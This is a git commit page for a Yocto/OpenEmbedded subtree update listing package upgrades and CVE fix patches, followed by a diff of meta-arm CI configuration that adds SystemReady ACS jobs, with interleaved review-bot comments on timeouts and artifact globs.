author: Andrew Geissler <geissonator@yahoo.com>, 2024-01-11 20:55:23 +0300
committer: Andrew Geissler <geissonator@yahoo.com>, 2024-01-11 20:56:06 +0300
commit: d4fa64b8fbad9ed7bef03090adec4a99cf9ecd5b
tree: cd2f355c9c8ae01d490e733e8c83d86f89e92bc8
parent: 06a6d53090fbf4da09a79d24c2147c5d78640b0c
subtree updates:nanbield: Jan 11, 2024
poky: bf9f2f6f60..61a59d00a0: Adam Johnston (1): useradd_base: Fix sed command line for passwd-expire Alexander Kanavin (1): cmake: upgrade 3.27.5 -> 3.27.7 Anuj Mittal (1): gstreamer1.0: upgrade 1.22.6 -> 1.22.7 Bastian Krause (1): linux-firmware: add new fw file to ${PN}-rtl8821 Bruce Ashfield (25): linux-yocto/6.1: update to v6.1.59 linux-yocto/6.1: update to v6.1.60 linux-yocto/6.5: update to v6.5.8 linux-yocto/6.5: update to v6.5.9 kern-tools: make lower context patches reproducible kern-tools: bump SRCREV for queue processing changes kern-tools: update SRCREV to include SECURITY.md file kernel-yocto: improve metadata patching linux-yocto/6.1: cfg: restore CONFIG_DEVMEM linux-yocto/6.1: update to v6.1.61 linux-yocto/6.1: update to v6.1.62 linux-yocto/6.1: update to v6.1.65 linux-yocto/6.5: cfg: restore CONFIG_DEVMEM linux-yocto/6.5: update to v6.5.10 linux-yocto/6.5: cfg: split runtime and symbol debug linux-yocto/6.5: update to v6.5.11 linux-yocto/6.5: update to v6.5.12 linux-yocto/6.5: update to v6.5.13 linux-yocto/6.1: drop removed IMA option linux-yocto-rt/6.1: update to -rt18 linux-yocto/6.1: update to v6.1.66 linux-yocto/6.1: update to v6.1.67 linux-yocto/6.1: update to v6.1.68 linux-yocto/6.5: drop removed IMA option linux-yocto/6.5: fix AB-INT: QEMU kernel panic: No irq handler for vector Chen Qi (1): systemd: fix DynamicUser issue Deepthi Hemraj (1): rust: Fix CVE-2023-40030 Dhairya Nagodra (2): cve-update-nvd2-native: faster requests with API keys cve-update-nvd2-native: increase the delay between subsequent request failures Dmitry Baryshkov (9): linux-firmware: upgrade 20230804 -> 20231030 linux-firmware: add missing depenencies on license packages linux-firmware: add notice file to sdm845 modem firmware linux-firmware: add audio topology symlink to the X13's audio package linux-firmware: package firmware for Qualcomm Adreno a702 linux-firmware: package firmware for Qualcomm QCM2290 / QRB4210 linux-firmware: package Qualcomm Venus 6.0 firmware 
linux-firmware: package Robotics RB5 sensors DSP firmware meson: use correct targets for rust binaries Fahad Arslan (1): linux-firmware: create separate packages Javier Tia (1): kernel-arch: use ccache only for compiler Jermain Horsman (2): lib/oe/buildcfg.py: Include missing import lib/oe/buildcfg.py: Remove unused parameter Joakim Tjernlund (1): sed -i destroys symlinks Joshua Watt (1): bitbake: asyncrpc: Add context manager API Julien Stephan (2): devtool: fix update-recipe dry-run mode devtool: finish/update-recipe: restrict mode srcrev to recipes fetched from SCM Justin Bronder (1): contributor-guide: add License-Update tag Khem Raj (1): python3-urllib3: Upgrade to 2.0.7 Lee Chee Yang (10): migration-guides: add release notes for 4.3.1 migration-guide: add release notes for 4.2.4 migration-guide: add release notes for 4.0.14 migration-guides: reword fix in release-notes-4.3.1 migration-guides: add release notes for 4.0.15 avahi: add CVE-2023-38473.patch to SRC_URL grub: fix CVE-2023-4692 CVE-2023-4693 curl: fix CVE-2023-46218 perlcross: update to 1.5.2 perl: 5.38.0 -> 5.38.2 Marco Felsch (1): json-c: fix icecc compilation Markus Volk (3): gtk: Add rdepend on printbackend for cups bluez5: fix connection for ps5/dualshock controllers cups: Add root,sys,wheel to system groups Marta Rybczynska (1): bitbake: toastergui: verify that an existing layer path is given Massimiliano Minella (1): systemd: update LICENSE statement Michael Opdenacker (14): migration-guides: release 3.5 is actually 4.0 contributor-guide: fix command option dev-manual: layers: update link to YP Compatible form ref-manual: releases.svg: update nanbield release status manuals: fix URL test-manual: text and formatting fixes test-manual: resource updates test-manual: add links to python unittest test-manual: explicit or fix file paths test-manual: add or improve hyperlinks dev-manual: runtime-testing: fix test module name test-manual: use working example systemd-compat-units.bb: fix postinstall 
script ref-manual: update tested and supported distros Paul Barker (1): ref-manual: Fix reference to MIRRORS/PREMIRRORS defaults Peter Kjellerstedt (3): oeqa/selftest/tinfoil: Add tests that parse virtual recipes dev-manual: Discourage the use of SRC_URI[md5sum] bitbake: command: Make parseRecipeFile() handle virtual recipes correctly Peter Marko (2): cve-update-nvd2-native: remove unused variable CVE_SOCKET_TIMEOUT cve-update-nvd2-native: make number of fetch attemtps configurable Randy MacLeod (1): strace: backport fix for so_peerpidfd-test Rasmus Villemoes (1): perf: lift TARGET_CC_ARCH modification out of security_flags.inc Richard Purdie (7): qemu: Upgrade 8.1.0 -> 8.1.2 sstate: Ensure sstate searches update file mtime testimage: Exclude wtmp from target-dumper commands bitbake: lib/bb: Add workaround for libgcc issues with python 3.8 and 3.9 linux/cve-exclusion6.1: Update to latest kernel point release package_ipk: Fix Source: field variable dependency testimage: Drop target_dumper and most of monitor_dumper Ross Burton (6): xwayland: upgrade to 23.2.2 linux-yocto: update CVE exclusions linux-yocto: update CVE exclusions lib/oe/patch: ensure os.chdir restoring always happens tcl: skip timing-dependent tests in run-ptest tcl: skip async and event tests in run-ptest Shubham Kulkarni (1): tzdata: Upgrade to 2023d Simone Weiß (1): manuals: brief-yoctoprojectqs: align variable order with default local.conf Steve Sakoman (2): poky.conf: bump version for 4.3.2 release build-appliance-image: Update to nanbield head revision Sundeep KOKKONDA (2): glibc: stable 2.38 branch updates binutils: stable 2.41 branch updates Tim Orling (2): lsb-release: use https for UPSTREAM_CHECK_URI vim: upgrade 9.0.2068 -> 9.0.2130 Trevor Gamblin (2): python3-ptest: skip test_storlines patchtest: shorten patch signed-off-by test output Vijay Anusuri (1): avahi: backport Debian patches to fix multiple CVE's Viswanath Kraleti (1): systemd-boot: Fix build issues on armv7a-linux Vyacheslav 
Yurkov (1): lib/oe/path: Deploy files can start only with a dot Wang Mingyu (16): base-passwd: upgrade 3.6.1 -> 3.6.2 enchant2: upgrade 2.6.1 -> 2.6.2 harfbuzz: upgrade 8.2.1 -> 8.2.2 libjpeg-turbo: upgrade 3.0.0 -> 3.0.1 libnewt: upgrade 0.52.23 -> 0.52.24 libnsl2: upgrade 2.0.0 -> 2.0.1 msmtp: upgrade 1.8.24 -> 1.8.25 glib-2.0: upgrade 2.78.0 -> 2.78.1 xserver-xorg: upgrade 21.1.8 -> 21.1.9 ghostscript: upgrade 10.02.0 -> 10.02.1 libsolv: upgrade 0.7.25 -> 0.7.26 bind: upgrade 9.18.19 -> 9.18.20 ell: upgrade 0.59 -> 0.60 libgcrypt: upgrade 1.10.2 -> 1.10.3 libxslt: upgrade 1.1.38 -> 1.1.39 log4cplus: upgrade 2.1.0 -> 2.1.1 William Lyu (1): openssl: improve handshake test error reporting Zoltán Böszörményi (1): update_gtk_icon_cache: Fix for GTK4-only builds meta-raspberrypi: 8231f97534..fde68b24f0: Lorenzo Arena (1): docs: fix syntax for overriding fs type for initramfs image meta-openembedded: 1750c66ae8..2da6e1b0e4: Alexandre Belloni (1): poco: fix branch Christian Eggers (1): python3-gcovr: switch to main branch Dylan Turner (1): apache2: v2.4.57 to v2.4.58 to fix CVE-2023-43622 Edi Feschiyan (1): libbytesize: update SRC_URI Fabio Estevam (3): openocd: Use https for github python3-piccata: Use https for github multipath-tools: Use https for github Jeffrey Pautler (1): apache2: add vendor to product name used for CVE checking Jonas Gorski (1): frr: fix CVEs CVE-2023-4675{2,3} and CVE-2023-4723{4,5} Khem Raj (3): hwdata: upgrade 0.370 -> 0.375 openvpn: upgrade 2.6.3 -> 2.6.6 python3-scapy: upgrade to latest revision Ross Burton (1): yajl: fix CVE-2017-16516, CVE-2022-24795, CVE-2023-33460 Wang Mingyu (3): hdf5: Fix install conflict when enable multilib. 
dnf-plugin-tui: Recover BBCLASSEXTEND variants strongswan: upgrade 5.9.11 -> 5.9.12 Zoltán Böszörményi (3): python3-ninja-syntax: Set BBCLASSEXTEND = "native nativesdk" python3-ninja: Set BBCLASSEXTEND = "native nativesdk" geos: Fix packaging meta-arm: 0bd7fece41..79c52afe74: Debbie Martin (2): arm-systemready: Add parted dependency and inherit testimage ci: Add Arm SystemReady firmware and IR ACS builds Harsimran Singh Tungal (1): arm-bsp/documentation: corstone1000: fix the steps in the user guide and instructions Change-Id: I9e8e09b85674d653415c01932a5f7a3cbeca877e Signed-off-by: Andrew Geissler <geissonator@yahoo.com>
-rw-r--r--meta-arm/.gitlab-ci.yml20
-rw-r--r--meta-arm/ci/arm-systemready-firmware.yml4
-rw-r--r--meta-arm/ci/arm-systemready-ir-acs.yml14
-rw-r--r--meta-arm/kas/arm-systemready-ir-acs.yml5
-rw-r--r--meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst2
-rw-r--r--meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst97
-rw-r--r--meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass7
-rw-r--r--meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb2
-rw-r--r--meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch125
-rw-r--r--meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch117
-rw-r--r--meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch95
-rw-r--r--meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch112
-rw-r--r--meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb6
-rw-r--r--meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.6.bb (renamed from meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.3.bb)4
-rw-r--r--meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.12.bb (renamed from meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.11.bb)2
-rw-r--r--meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb2
-rw-r--r--meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb2
-rw-r--r--meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch37
-rw-r--r--meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch59
-rw-r--r--meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch35
-rw-r--r--meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb6
-rw-r--r--meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb2
-rw-r--r--meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb6
-rw-r--r--meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.375.bb (renamed from meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.370.bb)2
-rw-r--r--meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb2
-rw-r--r--meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb2
-rw-r--r--meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb4
-rw-r--r--meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb2
-rw-r--r--meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb4
-rw-r--r--meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb1
-rw-r--r--meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb2
-rw-r--r--meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch31
-rw-r--r--meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb (renamed from meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.57.bb)5
-rw-r--r--meta-raspberrypi/docs/extra-build-config.md2
-rwxr-xr-xpoky/bitbake/bin/bitbake-hashclient36
-rw-r--r--poky/bitbake/lib/bb/__init__.py7
-rw-r--r--poky/bitbake/lib/bb/asyncrpc/client.py13
-rw-r--r--poky/bitbake/lib/bb/command.py8
-rw-r--r--poky/bitbake/lib/prserv/serv.py6
-rw-r--r--poky/bitbake/lib/toaster/toastergui/api.py13
-rw-r--r--poky/documentation/brief-yoctoprojectqs/index.rst4
-rw-r--r--poky/documentation/contributor-guide/recipe-style-guide.rst12
-rw-r--r--poky/documentation/contributor-guide/submit-changes.rst2
-rw-r--r--poky/documentation/dev-manual/debugging.rst2
-rw-r--r--poky/documentation/dev-manual/layers.rst4
-rw-r--r--poky/documentation/dev-manual/new-recipe.rst27
-rw-r--r--poky/documentation/dev-manual/runtime-testing.rst2
-rw-r--r--poky/documentation/migration-guides/migration-2.2.rst2
-rw-r--r--poky/documentation/migration-guides/migration-3.0.rst2
-rw-r--r--poky/documentation/migration-guides/migration-3.4.rst2
-rw-r--r--poky/documentation/migration-guides/release-4.0.rst2
-rw-r--r--poky/documentation/migration-guides/release-4.2.rst1
-rw-r--r--poky/documentation/migration-guides/release-4.3.rst1
-rw-r--r--poky/documentation/migration-guides/release-notes-4.0.14.rst227
-rw-r--r--poky/documentation/migration-guides/release-notes-4.0.15.rst189
-rw-r--r--poky/documentation/migration-guides/release-notes-4.2.4.rst364
-rw-r--r--poky/documentation/migration-guides/release-notes-4.3.1.rst237
-rw-r--r--poky/documentation/ref-manual/svg/releases.svg32
-rw-r--r--poky/documentation/ref-manual/system-requirements.rst23
-rw-r--r--poky/documentation/ref-manual/variables.rst10
-rw-r--r--poky/documentation/test-manual/intro.rst112
-rw-r--r--poky/documentation/test-manual/test-process.rst44
-rw-r--r--poky/documentation/test-manual/understand-autobuilder.rst62
-rw-r--r--poky/documentation/what-i-wish-id-known.rst5
-rw-r--r--poky/meta-poky/conf/distro/poky.conf2
-rw-r--r--poky/meta/classes-global/package_ipk.bbclass6
-rw-r--r--poky/meta/classes-global/sstate.bbclass12
-rw-r--r--poky/meta/classes-recipe/kernel-arch.bbclass6
-rw-r--r--poky/meta/classes-recipe/kernel-yocto.bbclass30
-rw-r--r--poky/meta/classes-recipe/meson.bbclass4
-rw-r--r--poky/meta/classes-recipe/rootfs-postcommands.bbclass4
-rw-r--r--poky/meta/classes-recipe/testimage.bbclass16
-rw-r--r--poky/meta/classes/useradd_base.bbclass2
-rw-r--r--poky/meta/conf/distro/include/security_flags.inc1
-rw-r--r--poky/meta/lib/oe/buildcfg.py11
-rw-r--r--poky/meta/lib/oe/patch.py7
-rw-r--r--poky/meta/lib/oe/path.py3
-rw-r--r--poky/meta/lib/oe/utils.py12
-rw-r--r--poky/meta/lib/oeqa/core/target/qemu.py10
-rw-r--r--poky/meta/lib/oeqa/core/target/ssh.py20
-rw-r--r--poky/meta/lib/oeqa/selftest/cases/tinfoil.py25
-rw-r--r--poky/meta/lib/oeqa/targetcontrol.py2
-rw-r--r--poky/meta/lib/patchtest/tests/test_patch.py3
-rw-r--r--poky/meta/recipes-bsp/grub/files/CVE-2023-4692.patch97
-rw-r--r--poky/meta/recipes-bsp/grub/files/CVE-2023-4693.patch62
-rw-r--r--poky/meta/recipes-bsp/grub/grub2.inc2
-rw-r--r--poky/meta/recipes-connectivity/avahi/avahi_0.8.bb9
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch58
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch48
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch65
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch57
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch52
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch73
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch52
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch45
-rw-r--r--poky/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch109
-rw-r--r--poky/meta/recipes-connectivity/bind/bind_9.18.20.bb (renamed from poky/meta/recipes-connectivity/bind/bind_9.18.19.bb)2
-rw-r--r--poky/meta/recipes-connectivity/bluez5/bluez5.inc1
-rw-r--r--poky/meta/recipes-connectivity/bluez5/bluez5/0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch313
-rw-r--r--poky/meta/recipes-connectivity/openssl/openssl/0001-Added-handshake-history-reporting-when-test-fails.patch374
-rw-r--r--poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb1
-rw-r--r--poky/meta/recipes-core/base-passwd/base-passwd/0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch35
-rw-r--r--poky/meta/recipes-core/base-passwd/base-passwd_3.6.2.bb (renamed from poky/meta/recipes-core/base-passwd/base-passwd_3.6.1.bb)3
-rw-r--r--poky/meta/recipes-core/ell/ell_0.60.bb (renamed from poky/meta/recipes-core/ell/ell_0.59.bb)2
-rw-r--r--poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.1.bb (renamed from poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.0.bb)2
-rw-r--r--poky/meta/recipes-core/glibc/glibc-version.inc2
-rw-r--r--poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb2
-rw-r--r--poky/meta/recipes-core/meta/cve-update-nvd2-native.bb27
-rw-r--r--poky/meta/recipes-core/systemd/systemd-boot_254.4.bb4
-rw-r--r--poky/meta/recipes-core/systemd/systemd-compat-units.bb3
-rw-r--r--poky/meta/recipes-core/systemd/systemd.inc3
-rw-r--r--poky/meta/recipes-core/systemd/systemd/0030-meson-Pass-all-static-pie-args-to-linker.patch35
-rw-r--r--poky/meta/recipes-core/systemd/systemd_254.4.bb30
-rw-r--r--poky/meta/recipes-devtools/binutils/binutils-2.41.inc2
-rw-r--r--poky/meta/recipes-devtools/cmake/cmake-native_3.27.7.bb (renamed from poky/meta/recipes-devtools/cmake/cmake-native_3.27.5.bb)0
-rw-r--r--poky/meta/recipes-devtools/cmake/cmake.inc2
-rw-r--r--poky/meta/recipes-devtools/cmake/cmake_3.27.7.bb (renamed from poky/meta/recipes-devtools/cmake/cmake_3.27.5.bb)0
-rw-r--r--poky/meta/recipes-devtools/json-c/json-c_0.17.bb3
-rw-r--r--poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.1.bb (renamed from poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.0.bb)2
-rw-r--r--poky/meta/recipes-devtools/perl-cross/files/0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch28
-rw-r--r--poky/meta/recipes-devtools/perl-cross/perlcross_1.5.2.bb (renamed from poky/meta/recipes-devtools/perl-cross/perlcross_1.5.bb)3
-rw-r--r--poky/meta/recipes-devtools/perl/perl_5.38.2.bb (renamed from poky/meta/recipes-devtools/perl/perl_5.38.0.bb)2
-rw-r--r--poky/meta/recipes-devtools/python/python3-urllib3_2.0.7.bb (renamed from poky/meta/recipes-devtools/python/python3-urllib3_2.0.6.bb)2
-rw-r--r--poky/meta/recipes-devtools/python/python3/0001-test_storlines-skip-due-to-load-variability.patch32
-rw-r--r--poky/meta/recipes-devtools/python/python3_3.11.5.bb1
-rw-r--r--poky/meta/recipes-devtools/qemu/qemu-native_8.1.2.bb (renamed from poky/meta/recipes-devtools/qemu/qemu-native_8.1.0.bb)0
-rw-r--r--poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.2.bb (renamed from poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.0.bb)0
-rw-r--r--poky/meta/recipes-devtools/qemu/qemu.inc5
-rw-r--r--poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch42
-rw-r--r--poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch157
-rw-r--r--poky/meta/recipes-devtools/qemu/qemu/CVE-2023-42467.patch49
-rw-r--r--poky/meta/recipes-devtools/qemu/qemu_8.1.2.bb (renamed from poky/meta/recipes-devtools/qemu/qemu_8.1.0.bb)0
-rw-r--r--poky/meta/recipes-devtools/rust/files/0002-CVE-2023-40030.patch412
-rw-r--r--poky/meta/recipes-devtools/rust/rust-source.inc1
-rw-r--r--poky/meta/recipes-devtools/strace/strace/skip-test-so_peerpidfd.gen.test.patch25
-rw-r--r--poky/meta/recipes-devtools/strace/strace/tests-fix-so_peerpidfd-test.patch32
-rw-r--r--poky/meta/recipes-devtools/strace/strace_6.5.bb2
-rw-r--r--poky/meta/recipes-devtools/tcltk/tcl/run-ptest6
-rw-r--r--poky/meta/recipes-extended/cups/cups.inc2
-rw-r--r--poky/meta/recipes-extended/ghostscript/ghostscript_10.02.1.bb (renamed from poky/meta/recipes-extended/ghostscript/ghostscript_10.02.0.bb)2
-rw-r--r--poky/meta/recipes-extended/libnsl/libnsl2_git.bb4
-rw-r--r--poky/meta/recipes-extended/libsolv/libsolv_0.7.26.bb (renamed from poky/meta/recipes-extended/libsolv/libsolv_0.7.25.bb)2
-rw-r--r--poky/meta/recipes-extended/lsb/lsb-release_1.4.bb3
-rw-r--r--poky/meta/recipes-extended/msmtp/msmtp_1.8.25.bb (renamed from poky/meta/recipes-extended/msmtp/msmtp_1.8.24.bb)2
-rw-r--r--poky/meta/recipes-extended/newt/libnewt_0.52.24.bb (renamed from poky/meta/recipes-extended/newt/libnewt_0.52.23.bb)2
-rw-r--r--poky/meta/recipes-extended/timezone/timezone.inc6
-rw-r--r--poky/meta/recipes-gnome/gtk+/gtk+3.inc2
-rw-r--r--poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb2
-rw-r--r--poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.2.bb (renamed from poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.1.bb)2
-rw-r--r--poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.1.bb (renamed from poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.0.bb)2
-rw-r--r--poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.9.bb (renamed from poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.8.bb)2
-rw-r--r--poky/meta/recipes-graphics/xwayland/xwayland_23.2.2.bb (renamed from poky/meta/recipes-graphics/xwayland/xwayland_23.2.1.bb)2
-rw-r--r--poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb2
-rw-r--r--poky/meta/recipes-kernel/linux-firmware/linux-firmware_20231030.bb (renamed from poky/meta/recipes-kernel/linux-firmware/linux-firmware_20230804.bb)288
-rw-r--r--poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc26
-rw-r--r--poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc22
-rw-r--r--poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb6
-rw-r--r--poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb6
-rw-r--r--poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb6
-rw-r--r--poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb6
-rw-r--r--poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb28
-rw-r--r--poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb28
-rw-r--r--poky/meta/recipes-kernel/perf/perf.bb9
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.7.bb (renamed from poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.6.bb)2
-rw-r--r--poky/meta/recipes-support/curl/curl/CVE-2023-46218.patch52
-rw-r--r--poky/meta/recipes-support/curl/curl_8.4.0.bb1
-rw-r--r--poky/meta/recipes-support/enchant/enchant2_2.6.2.bb (renamed from poky/meta/recipes-support/enchant/enchant2_2.6.1.bb)2
-rw-r--r--poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.3.bb (renamed from poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.2.bb)2
-rw-r--r--poky/meta/recipes-support/libxslt/libxslt_1.1.39.bb (renamed from poky/meta/recipes-support/libxslt/libxslt_1.1.38.bb)2
-rw-r--r--poky/meta/recipes-support/vim/vim.inc4
-rw-r--r--poky/scripts/lib/devtool/standard.py15
-rw-r--r--poky/scripts/postinst-intercepts/update_gtk_icon_cache6
182 files changed, 4542 insertions, 847 deletions
diff --git a/meta-arm/.gitlab-ci.yml b/meta-arm/.gitlab-ci.yml
index 9dee580705..22ecfd713a 100644
--- a/meta-arm/.gitlab-ci.yml
+++ b/meta-arm/.gitlab-ci.yml
@@ -9,6 +9,8 @@ variables:
# by default
FF_KUBERNETES_HONOR_ENTRYPOINT: 1
FF_USE_LEGACY_KUBERNETES_EXECUTION_STRATEGY: 0
+ ACS_TEST: 0
+ ACS_TAG: ""
stages:
- prep
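Review bot: The two new variables ACS_TEST and ACS_TAG are added under the existing "by default" comment, which describes the FF_ feature flags and says nothing about them. Add a one-line comment stating that ACS_TEST enables the SystemReady ACS testimage run and that ACS_TAG selects the runner for the arm-systemready-ir-acs job, and quote the value as in ci/arm-systemready-ir-acs.yml (ACS_TEST: "0") so the two defaults read the same.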
@@ -67,8 +69,8 @@ stages:
name: "logs"
when: always
paths:
- - $CI_PROJECT_DIR/work/build/tmp/work*/**/temp/log.do_*.*
- - $CI_PROJECT_DIR/work/build/tmp/work*/**/testimage/*
+ - $CI_PROJECT_DIR/work/build/tmp*/work*/**/temp/log.do_*.*
+ - $CI_PROJECT_DIR/work/build/tmp*/work*/**/testimage/*
#
# Prep stage, update repositories once.
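Review bot: The widened glob tmp*/work* in both artifact paths matches every directory under work/build whose name starts with tmp, and with "when: always" everything it matches is uploaded with the logs artifact. If the intent is to pick up one additional TMPDIR used by the new SystemReady builds, list that directory explicitly or add a comment naming it, so unrelated tmp-prefixed directories are not swept into the artifact.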
@@ -126,6 +128,20 @@ fvp-base:
matrix:
- TESTING: testimage
- FIRMWARE: edk2
+ - SYSTEMREADY_FIRMWARE: arm-systemready-firmware
+
+arm-systemready-ir-acs:
+ extends: .build
+ timeout: 12h
+ parallel:
+ matrix:
+ # arm-systemready-ir-acs must be specified after fvp-base for ordering
+ # purposes for the jobs-to-kas output. It is not enough to just have it
+ # in the job name because fvp-base.yml overwrites the target.
+ - PLATFORM: fvp-base
+ ARM_SYSTEMREADY_IR_ACS: arm-systemready-ir-acs
+ tags:
+ - ${ACS_TAG}
fvps:
extends: .build
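Review bot: The "timeout: 12h" on the new arm-systemready-ir-acs job is shorter than what kas/arm-systemready-ir-acs.yml states for this target: its comment says a full testimage run "typically takes around 12-24h on fvp-base" and TEST_OVERALL_TIMEOUT is set to 24 hours, so a run with ACS_TEST enabled can be cut off by CI before the test's own timeout applies. Raise the job timeout to cover the test timeout or document that a full run needs an override. Separately, "tags: - ${ACS_TAG}" expands to an empty tag with the default ACS_TAG: "", so a comment saying which runner tag is expected when ACS_TEST is enabled would help.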
diff --git a/meta-arm/ci/arm-systemready-firmware.yml b/meta-arm/ci/arm-systemready-firmware.yml
new file mode 100644
index 0000000000..1854c2ab65
--- /dev/null
+++ b/meta-arm/ci/arm-systemready-firmware.yml
@@ -0,0 +1,4 @@
+header:
+ version: 11
+ includes:
+ - kas/arm-systemready-firmware.yml
diff --git a/meta-arm/ci/arm-systemready-ir-acs.yml b/meta-arm/ci/arm-systemready-ir-acs.yml
new file mode 100644
index 0000000000..6cfead6c2d
--- /dev/null
+++ b/meta-arm/ci/arm-systemready-ir-acs.yml
@@ -0,0 +1,14 @@
+header:
+ version: 11
+ includes:
+ - kas/arm-systemready-ir-acs.yml
+
+env:
+ ACS_TEST: "0"
+
